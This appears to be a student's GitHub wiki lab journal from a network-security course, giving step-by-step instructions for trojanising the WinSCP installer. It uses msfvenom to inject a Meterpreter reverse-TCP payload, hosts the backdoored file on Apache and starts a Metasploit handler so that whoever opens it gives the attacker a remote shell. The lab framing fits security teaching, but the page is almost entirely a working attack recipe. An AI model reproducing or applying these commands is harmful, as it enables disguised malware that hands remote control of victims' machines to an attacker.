Backdoor Programs - tmansfield42/Tech-Journal GitHub Wiki

Summary: Used a legitimate program and added a backdoor to it in order to get remote access to anyone who downloads and opens the program

Preparation: Ensure Person 1 Windows 7 system is on her LAN segment.

Person 2, put your Kali network adapter on the NETSEC-WAN segment.

make a note of Person 2's IP address.

Person 2, download the original version of WinSCP to your Kali workstation: https://tinyurl.com/2nvuxe7m

Steps:

Person 2: cd ~/Downloads & then type ls (check to see if WinSCP is there)

Person 2: msfvenom -x WinSCP.exe -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=8080 -f exe -o WinSCP-3.8.5.exe

Person 2: sudo cp WinSCP-3.8.5.exe /var/www/html

Person 2: sudo service apache2 start

Person 2: sudo service apache2 status

Person 2: msfconsole use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST X.X.X.X set LPORT 8080 exploit

Person 1: go to http://X.X.X.X/WinSCP-3.8.5.exe

Person 1: open the download

Guide